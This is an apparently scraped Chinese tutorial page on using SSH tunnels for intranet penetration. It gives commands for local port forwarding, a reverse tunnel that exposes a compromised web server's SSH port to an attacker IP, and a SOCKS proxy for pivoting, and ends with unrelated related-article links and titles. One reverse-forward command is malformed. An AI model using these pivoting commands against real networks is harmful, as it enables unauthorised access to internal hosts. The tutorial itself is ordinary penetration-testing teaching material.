内网渗透之——ssh隧道

网络拓扑图:

ssh 正向链接:

在web服务器执行:ssh -CNfL 0.0.0.0:7777:10.10.10.128:80 web@127.0.0.1

(在web服务器做端口映射,将数据服务器的80端口映射到web服务器的7777端口,随后访问192.168.0.144:7777即可访问到数据库的80页面。)

反向连接:

将web服务器的22端口转发出去到黑客IP

web服务器执行:

ssh -qTfnN -R 2222:127.0.0.1 root@192.168.0.115 输入密码

在攻击机上输入:

ssh -p 2222 web@127.0.0.1 输入密码便可以访问

ssh sockets 代理

在web服务器执行 SSH -qTfnN -D prot root@192.168.0.155

在155浏览器中设置代理,代理为web服务器以及10086端口。

例如 ssh -qTfnN -D 10086 root@192.168.0.155 输入root密码成功连接

内网渗透-SSH隧道相关推荐

  1. 0x02 内网渗透篇

     来源如下图:(微信公众号:0x00实验室) 00 - 内网渗透的流程 拿到跳板后,先探测一波内网存活主机,用net user /domian命令查看跳板机是否在域内,探测存活主机.提权.提取hash ...

  2. ipv6 访问内网_【内网渗透】—— 隐藏通信隧道技术之网络层隧道技术

    hidden:是否完全隐藏控制面板,还有很多设置参数,比如也可以设置显示面板,然后设置宽高WIDTH="整数" 和 HIGH="整数". 1. 隐藏通信隧道基础 ...

  3. 内网渗透-端口转发隧道技术

    文章目录 代理和隧道技术区别 隧道通信原理 常用的隧道技术 判断内网协议连通性 ICMP协议 TCP协议 telnet NC HTTP协议 curl Wget DNS协议 nslookup dig I ...

  4. 内网渗透系列:内网隧道之ICMP隧道

    目录 前言 一.ICMP隧道技术 1.ICMP协议 (1)报文格式 (2)ping 2.ICMP隧道 (1)原理 (2)优缺点 二.ICMP隧道工具 1.icmpsh (1)源码 (2)用法 2.ic ...

  5. 内网渗透系列:内网隧道之pingtunnel

    目录 前言 一.概述 1.简介 2.原理 3.使用 (1)直连出网 (2)跳板出网 二.实践 1.场景 2.建立隧道 (1)攻击机 (2)目标机 (3)nc 3.抓包看看 三.探索 1.源码与分析 ( ...

  6. 内网渗透系列:内网隧道之icmpsh

    目录 前言 一.概述 1.简介 2.原理 3.使用 二.实践 1.场景 2.建立隧道 (1)攻击机 (2)目标机 (3)隧道建立成功 3.抓包看看 三.探索 1.源码与分析 (1)客户端 (2)服务端 ...

  7. 红蓝对抗 linux内网渗透

    目录 一.前言 二.提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权 三.隧道 3.1 SSH 3.2 nc/ncat 3.3 portmap ...

  8. 小迪渗透内网渗透(玖)

    文章目录 65. 域环境&工作组&局域网方针(65-72) 演示案例: 涉及资源: 66. 横向批量&schtasks&im&packet 演示案例: 涉及资源 ...

  9. 内网渗透 | FRP代理工具详解

    FRP工具的使用 FRP官方文档:https://gofrp.org/docs 文章目录 **一.FRP工具的介绍** **1.为什么需要内网穿透** **2.FRP介绍** **3.为什么使用FRP ...

最新文章

  1. NLP学习思维导图,非常的全面和清晰
  2. asp.net core系列 38 WebAPI 返回类型与响应格式--必备
  3. 数据科学家最常用的十种算法
  4. 【Android工具】高端DLNA音乐播放器Hi-Fi Cast 来自play
  5. 1个价值80亿美元的iPod
  6. 软件测试理论入门(一)
  7. [Swift]LeetCode246.对称数 $ Strobogrammatic Number
  8. 几个功能强大的系统源码(机票分销、机票预订、OA、手机充值、wifi营销、网络超市、体检平台)...
  9. 老男孩IT教育在线3期新学员司毅第一期作业
  10. linux不能上网如何配置
  11. C语言不挂科之我爱谭浩强——选择填空拿满分(附例题答案和知识点详解)
  12. opencv计算机视觉编程攻略 第2版,OpenCV计算机视觉编程攻略(第2版)pdf
  13. 同样是程序员,他转行在新加坡卖鱼走向巅峰!
  14. 计算机vf知识点总结,计算机等级考试二级VF常用函数总结
  15. Python自动化之socket初识
  16. Mac系统下安装svn环境方法
  17. James+Javamail构建邮箱服务
  18. 周志华《机器学习》个人笔记
  19. 你知道有哪些超级好用的网盘存储吗?
  20. VC资源编辑器里对话框的大小和实际的像素尺寸显示问题

热门文章

  1. Saving Files
  2. android 通讯录 首字母索引,android仿微信通讯录搜索(匹配拼音,字母,索引位置标记颜色)...
  3. Android 自定义View 仿微信好友,字母排序
  4. 微信表情图像代表什么意思_微信里所有的表情图片各是什么意思?
  5. CSS 还能这样玩?奇思妙想渐变的艺术
  6. C语言练习(三) -----F0803 编程题 2020年
  7. window10 docker安装nginx报104.18.124.25:443: i/o timeout
  8. 快速开发框架源码 JNPF 旗舰版 单体版 java+netcore 炎黄盈动
  9. BUUCTF 还原大师 1
  10. “李四呢”这个名字挺独特的